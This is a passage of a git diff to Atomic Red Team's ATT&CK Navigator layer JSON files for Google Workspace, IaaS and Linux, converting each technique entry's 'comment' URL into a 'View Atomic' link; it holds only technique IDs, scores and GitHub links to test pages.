@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1078.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json index 9256138e..42be7106 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 8d9d6018..ff6a3888 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"technique
ID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","sc
ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true
,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled"
:true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1082","score":
100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"com
ment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1484.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1484","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob
/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1556.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/at
omic-red-team/blob/master/atomics/T1556.003/T1556.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.c
om/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1606.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1606","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View 